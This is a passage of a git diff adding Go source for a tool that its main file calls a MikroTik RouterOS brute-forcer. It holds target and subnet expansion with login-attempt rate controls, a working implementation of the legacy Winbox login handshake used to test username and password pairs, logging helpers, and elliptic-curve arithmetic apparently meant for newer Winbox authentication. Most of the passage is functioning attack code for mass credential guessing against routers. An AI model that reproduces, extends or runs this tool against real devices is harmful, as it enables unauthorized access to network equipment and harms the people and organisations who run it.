len(ports) +} + +func incIP(ip net.IP) { + for j := len(ip) - 1; j >= 0; j-- { + ip[j]++ + if ip[j] > 0 { + break + } + } +} + +func parseCIDR(ip string, ports []int, isIPv6 bool) int { + na, nm, err := net.ParseCIDR(ip) + if err != nil { + log("ep", 0, "failed to parse CIDR notation for \"%v\": %v", ip, err.Error()) + return 0 + } + + mask, maskBits := nm.Mask.Size() + if mask < maskBits-maxNetmaskSize { + log("ep", 0, "ignoring out of safe bounds CIDR netmask for \"%v\": %v (max: %v, allowed: %v)", ip, mask, maskBits, maxNetmaskSize) + return 0 + } + + curHost := 0 + maxHost := 1<<(maskBits-mask) - 1 + numParsed := 0 + strict := CfgGetSwitch("strict-subnets") + + log("ep", 2, "expanding CIDR: \"%v\" to %v hosts", ip, maxHost+1) + + for expIP := na.Mask(nm.Mask); nm.Contains(expIP); incIP(expIP) { + if strict && (curHost == 0 || curHost == maxHost) && maskBits-mask >= 2 { + log("ep", 1, "ignoring network/broadcast address due to strict-subnets: \"%v\"", expIP.String()) + } else { + numParsed += parseIPPorts(expIP.String(), ports, isIPv6) + } + curHost++ + } + + return numParsed +} + +func parseIPPorts(ip string, ports []int, isIPv6 bool) int { + // ip may be a domain name, a CIDR subnet or an IP address + // CIDR subnets must be expanded to plain IPs + + if strings.LastIndex(ip, "/") >= 0 { // this is a CIDR subnet + return parseCIDR(ip, ports, isIPv6) + } else if strings.Count(ip, "/") > 1 { // invalid CIDR notation + log("ep", 0, "invalid CIDR subnet format: \"%v\", ignoring", ip) + return 0 + } else { // otherwise, just register + return RegisterEndpoint(ip, ports, isIPv6) + } +} + +func extractIPAndPort(str string, skippedIPv6 *int) (ip string, port int, err error) { + var portString string + ip, portString, err = net.SplitHostPort(str) + if err != nil { + return "", 0, err + } + + port, err = strconv.Atoi(portString) + if err != nil { + return "", 0, err + } + + if port <= 0 || port > 65535 { + return "", 0, errors.New("invalid port: " + strconv.Itoa(port)) + } + + return ip, port, nil +} + +func ParseEndpoints(source []string) { + log("ep", 1, "parsing endpoints") + totalIPv6Skipped := 0 + numParsed := 0 + + for _, str := range source { + if !strings.Contains(str, ":") { + // no ":": this is an ipv4/dn without port, + // parse it with all known ports + + numParsed += parseIPPorts(str, CfgGetIntSlice("port"), false) + } else { + // either ipv4/dn with port, or ipv6 with/without port + + isIPv6 := strings.Count(str, ":") > 1 + if isIPv6 && CfgGetSwitch("no-ipv6") { + log("ep", 1, "skipping ipv6 target \"%v\" due to no-ipv6", str) + totalIPv6Skipped++ + continue + } + + if !strings.Contains(str, "]:") && strings.Contains(str, "::") { + // ipv6 without port + numParsed += parseIPPorts(str, CfgGetIntSlice("port"), true) + continue + } + + ip, port, err := extractIPAndPort(str, &totalIPv6Skipped) + if err != nil { + log("ep", 0, "failed to extract ip/port for \"%v\": %v", str, err.Error()) + continue + } + + ports := []int{port} + // append all default ports + if CfgGetSwitch("append-default-ports") { + for _, port2 := range CfgGetIntSlice("port") { + if port != port2 { + ports = append(ports, port2) + } + } + } + + numParsed += parseIPPorts(ip, ports, isIPv6) + } + } + + logIf(totalIPv6Skipped > 0, "ep", 0, "skipping %v IPv6 targets due to no-ipv6 flag", totalIPv6Skipped) + log("ep", 1, "finished parsing endpoints: got %v, total %v", numParsed, endpoints.Len()) +} + +func init() { + endpoints = list.New() + delayedEndpoints = list.New() + + CfgRegister("port", []int{8291}, "one or more default ports") + CfgRegister("max-aps", 5, "maximum number of attempts per second for an endpoint") + CfgRegisterSwitch("no-ipv6", "skip IPv6 entries") + CfgRegisterSwitch("append-default-ports", "always append default ports even for targets in host:port format") + CfgRegisterSwitch("strict-subnets", "strict subnet behaviour: ignore network and broadcast addresses in /30 and bigger subnets") + + CfgRegisterSwitch("keep-endpoint-on-good", "keep processing endpoint if a login/password was found") + + CfgRegister("conn-ratio", 0.15, "keep a failed endpoint if its bad/good connection ratio is lower than this value") + CfgRegister("max-bad-after-good-conn", 5, "how many consecutive bad connections to allow after a good connection") + CfgRegister("max-bad-conn", 20, "always remove endpoint after this many consecutive bad connections") + CfgRegister("min-bad-conn", 2, "do not consider removing an endpoint if it does not have this many consecutive bad connections") + + CfgRegister("proto-error-ratio", 0.25, "keep endpoints with a protocol error if their protocol error ratio is lower than this value") + CfgRegister("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors") + CfgRegister("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors") + + CfgRegister("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value") + CfgRegister("max-read-errors", 20, "always remove endpoint after this many consecutive read errors") + CfgRegister("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors") + + CfgRegister("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond") + CfgRegister("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error") + CfgRegister("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error") + +} diff --git a/go.mod b/go.mod new file mode 100644 index 0000000..9d22a28 --- /dev/null +++ b/go.mod @@ -0,0 +1,5 @@ +module mtbf + +go 1.18 + +require github.com/emirpasic/gods v1.18.1 diff --git a/go.sum b/go.sum new file mode 100644 index 0000000..b5ad666 --- /dev/null +++ b/go.sum @@ -0,0 +1,2 @@ +github.com/emirpasic/gods v1.18.1 h1:FXtiHYKDGKCW2KzwZKx0iC0PQmdlorYgdFG9jPXJ1Bc= +github.com/emirpasic/gods v1.18.1/go.mod h1:8tpGGwCnJ5H4r6BWwaV6OrWmMoPhUl5jm/FMNAnJvWQ= diff --git a/legacy-winbox.go b/legacy-winbox.go new file mode 100644 index 0000000..d11c6e7 --- /dev/null +++ b/legacy-winbox.go @@ -0,0 +1,439 @@ +package main + +import ( + "bytes" + "crypto/md5" + "encoding/binary" + "errors" + "fmt" + "io" + "strconv" +) + +const MT_BOOL_FALSE byte = 0x00 +const MT_BOOL_TRUE byte = 0x01 +const MT_DWORD byte = 0x08 +const MT_BYTE byte = 0x09 +const MT_STRING byte = 0x21 +const MT_HASH byte = 0x31 +const MT_ARRAY byte = 0x88 + +const MT_RECEIVER = 0xFF0001 +const MT_SENDER = 0xFF0002 +const MT_REPLY_EXPECTED = 0xFF0005 +const MT_REQUEST_ID = 0xFF0006 +const MT_COMMAND = 0xFF0007 + +type M2Element struct { + code int + value interface{} +} + +func (el *M2Element) String() string { + return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value) +} + + +type M2Message struct { + el []M2Element +} + +type M2Hash string + +func NewM2Message() *M2Message { + m2 := M2Message{} + return &m2 +} + +func (m2 *M2Message) Clear() { + m2.el = []M2Element{} +} + +func (m2 *M2Message) Append(code int, value interface{}) { + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, M2Element{code: code, value: value}) +} + +func (m2 *M2Message) AppendElement(el *M2Element) { + if m2.el == nil { + m2.Clear() + } + m2.el = append(m2.el, *el) +} + +func (m2 *M2Message) Bytes() []byte { + res := []byte{} + + for _, el := range m2.el { + buf := new(bytes.Buffer) + + binary.Write(buf, binary.LittleEndian, uint16(el.code)) + binary.Write(buf, binary.LittleEndian, byte(el.code >> 16)) + + switch v := el.value.(type) { + case bool: + binary.Write(buf, binary.LittleEndian, v) + case byte: + binary.Write(buf, binary.LittleEndian, byte(MT_BYTE)) + binary.Write(buf, binary.LittleEndian, v) + case int: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, int32(v)) + case uint: + binary.Write(buf, binary.LittleEndian, byte(MT_DWORD)) + binary.Write(buf, binary.LittleEndian, uint32(v)) + case string: + binary.Write(buf, binary.LittleEndian, byte(MT_STRING)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case M2Hash: + binary.Write(buf, binary.LittleEndian, byte(MT_HASH)) + binary.Write(buf, binary.LittleEndian, byte(len(v))) + binary.Write(buf, binary.LittleEndian, []byte(v)) + case []byte: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + case []int: + binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY)) + binary.Write(buf, binary.LittleEndian, uint16(len(v))) + for _, i := range v { + binary.Write(buf, binary.LittleEndian, int32(i)) + } + } + + res = append(res, buf.Bytes()...) + } + + header := make([]byte, 6) + header[0] = byte(len(res) + 4) + header[1] = 0x01 + header[2] = 0x00 + header[3] = byte(len(res) + 2) + header[4] = 0x4D + header[5] = 0x32 + + return append(header, res...) +} + + +func (m2 *M2Message) ParseM2Element(buf io.Reader) error { + var codeAndType uint32 + err := binary.Read(buf, binary.LittleEndian, &codeAndType) + if err != nil { + return err + } + + el := M2Element{code: int(codeAndType & 0x00FFFFFF)} + keyType := byte(codeAndType >> 24) + log("lw", 3, "m2 code=%v type=%v", el.code, keyType) + + switch keyType { + case MT_BOOL_FALSE, MT_BOOL_TRUE: + el.value = keyType == MT_BOOL_TRUE + log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool)) + case MT_BYTE: + var b byte + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte)) + case MT_DWORD: + var b int32 + err = binary.Read(buf, binary.LittleEndian, &b) + el.value = b + log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32)) + + case MT_STRING: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = string(bs) + log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string)) + + case MT_HASH: + var length byte + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + bs := make([]byte, length) + _, err = io.ReadFull(buf, bs) + el.value = M2Hash(bs) + log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash))) + + case MT_ARRAY: + var length uint16 + err = binary.Read(buf, binary.LittleEndian, &length) + if err != nil { + return err + } + + sl := []int{} + for i := 0; i < int(length); i++ { + var el2 int32 + err = binary.Read(buf, binary.LittleEndian, &el2) + if err != nil { + break + } + sl = append(sl, int(el2)) + } + el.value = sl + log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int)) + + default: + return errors.New("unknown key code " + strconv.Itoa(int(keyType))) + } + + if err != nil { + return err + } + + m2.el = append(m2.el, el) + return nil +} + +func (m2 *M2Message) ParseM2Message(buf io.Reader) error { + var headerBlockSize, m2BlockSize byte + var m2Extra, m2Header uint16 + err := binary.Read(buf, binary.LittleEndian, &headerBlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Extra) + err = binary.Read(buf, binary.LittleEndian, &m2BlockSize) + err = binary.Read(buf, binary.LittleEndian, &m2Header) + if err != nil { + return err + } + if m2Extra != 0x1 { + return errors.New("invalid M2_EXTRA") + } + if m2Header != 0x324D { + return errors.New("invalid M2_HEADER") + } + + for { + log("lw", 3, "parsing new m2 element") + err := m2.ParseM2Element(buf) + if err != nil { + return err + } + } +} + +func ParseM2Messages(src []byte) (messages []M2Message, err error) { + messages = []M2Message{} + buf := bytes.NewReader(src) + + for { + m2 := NewM2Message() + err := m2.ParseM2Message(buf) + + if err == io.EOF { + messages = append(messages, *m2) + break + } else if err != nil { + return nil, err + } else { + messages = append(messages, *m2) + } + } + + + log("lw", 3, "m2 eof after %v messages", len(messages)) + return messages, nil +} + + + + + + + + + + +type LegacyWinbox struct { + task *Task + stage int + m2 []M2Message +} + +func NewLegacyWinbox(task *Task) *LegacyWinbox { + lw := LegacyWinbox{task: task, stage: -1, m2: []M2Message{}} + return &lw +} + + +// req1 +func (lw *LegacyWinbox) MTReqList() []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{2, 2}) + m2.Append(MT_COMMAND, byte(7)) + m2.Append(MT_REQUEST_ID, byte(1)) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, "list") + return m2.Bytes() +} + +// res1 +func (lw *LegacyWinbox) MTGetSid(m2 []M2Message) *M2Element { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xFE0001 { + return &el + } + } + } + + return nil +} + + +// req2 +func (lw *LegacyWinbox) MTReqChallenge(sid *M2Element) []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(4)) + m2.Append(MT_REQUEST_ID, byte(2)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + return m2.Bytes() +} + +// res2 +func (lw *LegacyWinbox) MTGetSalt(m2 []M2Message) M2Hash { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0x9 { + return el.value.(M2Hash) + } + } + } + + return "" +} + + +// req3 +func (lw *LegacyWinbox) MTReqAuth(sid *M2Element, login, digest, salt string) []byte { + m2 := NewM2Message() + m2.Append(MT_RECEIVER, []byte{13, 4}) + m2.Append(MT_COMMAND, byte(1)) + m2.Append(MT_REQUEST_ID, byte(3)) + m2.AppendElement(sid) + m2.Append(MT_REPLY_EXPECTED, true) + m2.Append(1, login) + m2.Append(9, M2Hash(salt)) + m2.Append(10, M2Hash(digest)) + return m2.Bytes() +} + +// res3 +func (lw *LegacyWinbox) MTGetResult(m2 []M2Message) (res bool, err error) { + for _, msg := range m2 { + for _, el := range msg.el { + if el.code == 0xA { + _, ok := el.value.(M2Hash) + if ok { + return true, nil + } + } else if el.code == 0xFF0008 { + v, ok := el.value.(int32) + if ok && v == 0xFE0006 { + return false, nil + } + } + } + } + + return false, errors.New("no auth marker found") +} + + + + +func (lw *LegacyWinbox) SendRecv(buf []byte) (res []byte, err error) { + _, err = lw.task.conn.Write(buf) + if err != nil { + log("lw", 1, "failed to send: %v", err.Error()) + return nil, err + } + + resp := make([]byte, 1024) + n, err := lw.task.conn.Read(resp) + if err != nil { + log("lw", 1, "failed to recv: %v", err.Error()) + return nil, err + } + + return resp[:n], nil +} + + +func (lw *LegacyWinbox) TryLogin() (res bool, err error) { + log("lw", 2, "login: stage 1, req_list") + r1, err := lw.SendRecv(lw.MTReqList()) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 2, got response for req_list") + msg, err := ParseM2Messages(r1) + if err != nil { + return false, err + } + + sid := lw.MTGetSid(msg) + if sid == nil { + return false, errors.New("failed to get SID from stage 2") + } + log("lw", 2, "login: stage 2, sid %v", sid.String()) + r2, err := lw.SendRecv(lw.MTReqChallenge(sid)) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 3, got response for req_challenge") + log("lw", 2, "r2: %v", r2) + + msg, err = ParseM2Messages(r2) + if err != nil { + return false, err + } + + salt := lw.MTGetSalt(msg) + if salt == "" { + return false, errors.New("failed to get salt from stage 3") + } + + sl := []byte{0} + sl = append(sl, []byte(lw.task.password)...) + sl = append(sl, []byte(salt)...) + d := md5.Sum(sl) + digest := append([]byte{0}, d[:]...) + + log("lw", 2, "login: stage 3, hash %v", digest) + r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt))) + if err != nil { + return false, err + } + + log("lw", 2, "login: stage 4, got response for req_salt") + msg, err = ParseM2Messages(r3) + if err != nil { + return false, err + } + + res, err = lw.MTGetResult(msg) + log("lw", 2, "login: stage 5: res=%v err=%v", res, err) + + return res, err +} diff --git a/log.go b/log.go new file mode 100644 index 0000000..9b3f30a --- /dev/null +++ b/log.go @@ -0,0 +1,91 @@ +package main + +import ( + "fmt" + "os" + "strings" +) + +func shouldLog(facility string, level, maxLevel int) bool { + moduleMap := CfgGet("log-module-map").(map[string]bool) + + logModule, ok := moduleMap[strings.ToLower(facility)] + if ok { + return logModule + } + + if maxLevel < 0 { + return true // log everything if log-level is -1 + } + + return maxLevel >= level +} + +func log(facility string, level int, s string, params ...interface{}) { + maxLevel := CfgGetInt("log-level") + if !shouldLog(facility, level, maxLevel) { + return + } + + var prefix = "" + if level > 0 { + prefix = strings.Repeat("-", level) + "> " + } + if (maxLevel >= 2 || maxLevel < 0) && facility != "" { + prefix = prefix + "[" + strings.ToUpper(facility) + "]: " + } + + if len(params) == 0 { + fmt.Printf(prefix + s + "\n") + } else { + fmt.Printf(prefix+s+"\n", params...) + } +} + +func fail(s string, params ...interface{}) { + if len(params) == 0 { + fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n") + } else { + fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n", params...) + } + os.Exit(1) +} + +func logIf(condition bool, facility string, level int, s string, params ...interface{}) { + if condition { + log(facility, level, s, params...) + } +} + +func failIf(condition bool, s string, params ...interface{}) { + if condition { + fail(s, params...) + } +} + +func updateModuleMap() { + logModules := CfgGet("log-modules").([]string) + noLogModules := CfgGet("no-log-modules").([]string) + + newMap := map[string]bool{} + + for _, module := range logModules { + module = strings.ToLower(module) + newMap[module] = true + } + + for _, module := range noLogModules { + module = strings.ToLower(module) + failIf(newMap[module] == true, "log module \"%v\" is defined both in log-modules and no-log-modules", module) + newMap[module] = false + } + + CfgSet("log-module-map", newMap) +} + +func init() { + CfgRegister("log-level", 0, "max log level, useful for debugging. -1 logs everything") + CfgRegisterCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap) + CfgRegisterCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap) + CfgRegisterHidden("log-module-map", map[string]bool{}) +} diff --git a/math.go b/math.go new file mode 100644 index 0000000..c9fb82b --- /dev/null +++ b/math.go @@ -0,0 +1,132 @@ +package main + +import ( + _ "fmt" + "math" +) + +func powInt(x, y int) int { + return int(math.Pow(float64(x), float64(y))) +} + +func egcd(a, b bigint) (g, x, y bigint) { + if a.Empty() { + return b, NewBigint(0), NewBigint(1) + } else { + g, y, x = egcd(b.Mod(a), a) + return g, x.Sub(b.Div(a).Mul(y)), y + } +} + +func modinv(a, p bigint) bigint { + if a.LtInt(0) { + a = a.Mod(p) + } + + g, x, _ := egcd(a, p) + if g.NeInt(1) { + panic("modular inverse does not exist") + } else { + return x.Mod(p) + } +} + +func leftmostBit(x bigint) bigint { + if x.LteInt(0) { + panic("x must be greater than 0") + } + + res := NewBigint(1) + for res.Lte(x) { + res = res.MulInt(2) + } + + return res.DivInt(2) +} + +func naf(mult bigint) []bigint { + ret := make([]bigint, 0) + + for mult.GtInt(0) { + if mult.ModInt(2).GtInt(0) { + nd := mult.ModInt(4) + if nd.GteInt(2) { + nd = nd.SubInt(4) + } + ret = append(ret, nd) + mult = mult.Sub(nd) + } else { + ret = append(ret, NewBigint(0)) + } + + mult = mult.DivInt(2) + } + + return ret +} + +func legendreSymbol(a, p bigint) bigint { + l := a.ModExp(p.SubInt(1).DivInt(2), p) + if l.Eq(p.SubInt(1)) { + return NewBigint(-1) + } else { + return l + } +} + +func primeModSqrt(a, p bigint) (bigint, bigint) { + a = a.Mod(p) + + if a.EqInt(0) { + return NewBigint(0), NewEmptyBigint() + } + + if p.EqInt(2) { + return a, NewEmptyBigint() + } + + if legendreSymbol(a, p).NeInt(1) { + return NewEmptyBigint(), NewEmptyBigint() + } + + if p.ModInt(4).EqInt(3) { + x := a.ModExp(p.AddInt(1).DivInt(4), p) + return x, p.Sub(x) + } + + q, s := p.SubInt(1), 0 + for q.ModInt(2).EqInt(0) { + s++ + q = q.DivInt(2) + } + + z := NewBigint(1) + for legendreSymbol(z, p).NeInt(-1) { + z = z.AddInt(1) + } + + c := z.ModExp(q, p) + x := a.ModExp(q.AddInt(1).DivInt(2), p) + t := a.ModExp(q, p) + m := s + + for t.NeInt(1) { + i, e := 0, NewBigint(2) + if m > 0 { + for i = 1; i < m; i++ { + if t.ModExp(e, p).EqInt(1) { + break + } + e = e.MulInt(2) + } + } + + b := c.ModExp(NewBigint(powInt(2, m-i-1)), p) + x = x.Mul(b).Mod(p) + t = t.Mul(b).Mul(b).Mod(p) + c = b.Mul(b).Mod(p) + m = i + } + + return x, p.Sub(x) +} diff --git a/mtbf.go b/mtbf.go new file mode 100644 index 0000000..55f4ea6 --- /dev/null +++ b/mtbf.go @@ -0,0 +1,16 @@ +package main + +func main() { + log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1") + parseAppConfig() + + OpenOutFile() + defer CloseOutFile() + LoadSources() + defer CloseSources() + + wg := InitializeThreads() + WaitForThreads(wg) + + log("main", 0, "finished") +} diff --git a/point.go b/point.go new file mode 100644 index 0000000..51f46b5 --- /dev/null +++ b/point.go @@ -0,0 +1,384 @@ +package main + +import ( + _ "fmt" +) + +type Point struct { + curve *WCurve + x, y bigint + order bigint +} + +var InfinityPoint *Point = NewInfPoint() + +func NewPoint(curve *WCurve, x, y, order bigint) *Point { + point := Point{} + point.x = x + point.y = y + point.order = order + + /*if curve != nil && !curve.containsPoint(x, y) { + panic("point is not on a curve") + }/* + + /*if curve != nil && curve.h.NeInt(1) && !order.Empty() { + if point.Mul(order).Eq(InfinityPoint) { + panic("point is not a scalar multiple") + } + }*/ + + return &point +} + +func NewInfPoint() *Point { + return NewPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint()) +} + +func (self *Point) IsInf() bool { + return self.curve == nil && self.x.Empty() && self.y.Empty() +} + +func (self *Point) Eq(other *Point) bool { + eqCurve := self.curve != nil && other.curve != nil && self.curve.Eq(other.curve) + eqX := !self.x.Empty() && !other.x.Empty() && self.x.Eq(other.x) + eqY := !self.y.Empty() && !other.y.Empty() && self.y.Eq(other.y) + + if self.IsInf() && other.IsInf() { + return true + } + + return eqCurve && eqX && eqY +} + +func (self *Point) Neg() *Point { + return NewPoint(self.curve, self.x, self.curve.p.Sub(self.y), NewEmptyBigint()) +} + +func (self *Point) Add(other *Point) *Point { + if other.Eq(InfinityPoint) { + return self + } + + if self.Eq(InfinityPoint) { + return other + } + + if !self.curve.Eq(other.curve) { + panic("cannot add points on different curves") + } + + if self.x.Eq(other.x) { + if self.y.Add(other.y).Mod(self.curve.p).EqInt(0) { + return NewInfPoint() + } else { + return self.Double() + } + } + + p := self.curve.p + im := modinv(other.x.Sub(self.x), p) + l := other.y.Sub(self.y).Mul(im).Mod(p) + + x3 := l.Mul(l).Sub(self.x).Sub(other.x).Mod(p) + y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p) + + return NewPoint(self.curve, x3, y3, NewEmptyBigint()) +} + +func (self *Point) Mul(other bigint) *Point { + e := other + + if e.EqInt(0) || (!self.order.Empty() && e.Mod(self.order).EqInt(0)) { + return NewInfPoint() + } + if self.Eq(InfinityPoint) { + return NewInfPoint() + } + if e.LtInt(0) { + return self.Neg().Mul(e.Neg()) + } + + e3 := e.MulInt(3) + negativeSelf := NewPoint(self.curve, self.x, self.y.Neg(), self.order) + i := leftmostBit(e3).DivInt(2) + res := self + + for i.GtInt(1) { + res = res.Double() + if !e3.And(i).EqInt(0) && e.And(i).EqInt(0) { + res = res.Add(self) + } + if e3.And(i).EqInt(0) && !e.And(i).EqInt(0) { + res = res.Add(negativeSelf) + } + + i = i.DivInt(2) + } + + return res +} + +func (self *Point) Double() *Point { + if self.Eq(InfinityPoint) { + return NewInfPoint() + } + + p := self.curve.p + a := self.curve.a + + im := modinv(self.y.MulInt(2), p) + l := self.x.MulInt(3).Mul(self.x).Add(a).Mul(im).Mod(p) + + x3 := l.Mul(l).Sub(self.x.MulInt(2)).Mod(p) + y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p) + + return NewPoint(self.curve, x3, y3, NewEmptyBigint()) +} + +type JacobiPoint struct { + curve *WCurve + x, y, z bigint + order bigint +} + +func NewJacobiPoint(curve *WCurve, x, y, z, order bigint) *JacobiPoint { + // attempt to initialize normal point + NewPoint(curve, x, y, order) + + point := JacobiPoint{} + point.x = x + point.y = y + point.z = z + point.curve = curve + point.order = order + return &point +} + +func NewInfJacobiPoint() *JacobiPoint { + return NewJacobiPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint()) +} + +func (self *JacobiPoint) IsInf() bool { + return self.curve == nil && self.x.Empty() && self.y.Empty() && self.z.Empty() +} + +func (self *JacobiPoint) EqCoords(x2, y2, z2 bigint) bool { + x1 := self.x + y1 := self.y + z1 := self.z + p := self.curve.p + + zz1 := z1.Mul(z1).Mod(p) + zz2 := z2.Mul(z2).Mod(p) + + m1 := x1.Mul(zz2).Sub(x2.Mul(zz1)).Mod(p) + m2 := y1.Mul(zz2).Mul(z2).Sub(y2.Mul(zz1).Mul(z1)).Mod(p) + + return m1.EqInt(0) && m2.EqInt(0) +} + +func (self *JacobiPoint) EqPoint(other *Point) bool { + if other.IsInf() { + return self.y.Empty() || self.z.Empty() + } + if !self.curve.Eq(other.curve) { + return false + } + + return self.EqCoords(other.x, other.y, NewBigint(1)) +} + +func (self *JacobiPoint) Eq(other *JacobiPoint) bool { + if other.IsInf() { + return self.y.Empty() || self.z.Empty() + } + if !self.curve.Eq(other.curve) { + return false + } + + return self.EqCoords(other.x, other.y, other.z) +} + +func (self *JacobiPoint) Neg() *JacobiPoint { + return NewJacobiPoint(self.curve, self.x, self.y.Neg(), self.z, self.order) +} + +func (self *JacobiPoint) AffineX() bigint { + if self.z.EqInt(1) { + return self.x + } + + z := modinv(self.z, self.curve.p) + return self.x.Mul(z.Mul(z)).Mod(self.curve.p) +} + +func (self *JacobiPoint) AffineY() bigint { + if self.z.EqInt(1) { + return self.y + } + + z := modinv(self.z, self.curve.p) + return self.y.Mul(z.Mul(z).Mul(z)).Mod(self.curve.p) +} + +// modifies in-place +func (self *JacobiPoint) Scale() *JacobiPoint { + if self.z.EqInt(1) { + return self + } + + p := self.curve.p + zInv := modinv(self.z, p) + zzInv := zInv.Mul(zInv).Mod(p) + + x := self.x.Mul(zzInv).Mod(p) + y := self.y.Mul(zzInv).Mul(zInv).Mod(p) + + self.x = x + self.y = y + self.z = NewBigint(1) + return self +} + +func (self *JacobiPoint) ToAffine() *Point { + if self.y.Empty() || self.z.Empty() { + return NewInfPoint() + } + + self.Scale() + return NewPoint(self.curve, self.x, self.y, self.order) +} + +func (self *Point) FromAffine() *JacobiPoint { + return NewJacobiPoint(self.curve, self.x, self.y, NewBigint(1), self.order) +} + +func (self *JacobiPoint) _Double(x1, y1, z1, p, a bigint) (t, y3, z3 bigint) { + if y1.Empty() || z1.Empty() { + return NewBigint(0), NewBigint(0), NewBigint(1) + } + + xx, yy := x1.Mul(x1).Mod(p), y1.Mul(y1).Mod(p) + if yy.Empty() { + return NewBigint(0), NewBigint(0), NewBigint(1) + } + + yyyy := yy.Mul(yy).Mod(p) + zz := z1.Mul(z1).Mod(p) + + s := NewBigint(2).Mul(x1.Add(yy).Mul(x1.Add(yy)).Sub(xx).Sub(yyyy)).Mod(p) + m := NewBigint(3).Mul(xx).Add(a.Mul(zz).Mul(zz)).Mod(p) + t = m.Mul(m).Sub(NewBigint(2).Mul(s)).Mod(p) + y3 = m.Mul(s.Sub(t)).Sub(NewBigint(8).Mul(yyyy)).Mod(p) + z3 = y1.Add(z1).Mul(y1.Add(z1)).Sub(yy).Sub(zz).Mod(p) + + return t, y3, z3 +} + +func (self *JacobiPoint) Double() *JacobiPoint { + if self.y.Empty() { + return NewInfJacobiPoint() + } + + x3, y3, z3 := self._Double(self.x, self.y, self.z, self.curve.p, self.curve.a) + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) _Add(x1, y1, z1, x2, y2, z2, p bigint) (x3, y3, z3 bigint) { + if y1.Empty() || z1.Empty() { + return x2, y2, z2 + } + if y2.Empty() || z2.Empty() { + return x1, y1, z1 + } + + z1z1 := z1.Mul(z1).Mod(p) + z2z2 := z2.Mul(z2).Mod(p) + u1 := x1.Mul(z2z2).Mod(p) + u2 := x2.Mul(z1z1).Mod(p) + s1 := y1.Mul(z2).Mul(z2z2).Mod(p) + s2 := y2.Mul(z1).Mul(z1z1).Mod(p) + h := u2.Sub(u1) + i := NewBigint(4).Mul(h).Mul(h).Mod(p) + j := h.Mul(i).Mod(p) + r := NewBigint(2).Mul(s2.Sub(s1)).Mod(p) + + if h.Empty() && r.Empty() { + return self._Double(x1, y1, z1, p, self.curve.a) + } + + v := u1.Mul(i) + x3 = r.Mul(r).Sub(j).Sub(NewBigint(2).Mul(v)).Mod(p) + y3 = r.Mul(v.Sub(x3)).Sub(NewBigint(2).Mul(s1).Mul(j)).Mod(p) + z3 = z1.Add(z2).Mul(z1.Add(z2)).Sub(z1z1).Sub(z2z2).Mul(h).Mod(p) + + return x3, y3, z3 +} + +func (self *JacobiPoint) AddPoint(other *Point) *JacobiPoint { + return self.Add(other.FromAffine()) +} + +func (self *JacobiPoint) Add(other *JacobiPoint) *JacobiPoint { + if other.IsInf() { + return self + } + + if self.IsInf() { + return other + } + + if !self.curve.Eq(other.curve) { + panic("cannot add with different curves") + } + + x3, y3, z3 := self._Add(self.x, self.y, self.z, other.x, other.y, other.z, self.curve.p) + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) Mul(other bigint) *JacobiPoint { + if self.y.Empty() || other.Empty() { + return NewInfJacobiPoint() + } + if other.EqInt(1) { + return self + } + if !self.order.Empty() { + other = other.Mod(self.order.MulInt(2)) + } + + self = self.Scale() + x2, y2 := self.x, self.y + x3, y3, z3 := NewBigint(0), NewBigint(0), NewBigint(1) + p, a := self.curve.p, self.curve.a + + nf := naf(other) + + for i := len(nf) - 1; i >= 0; i-- { + x3, y3, z3 = self._Double(x3, y3, z3, p, a) + if nf[i].LtInt(0) { + x3, y3, z3 = 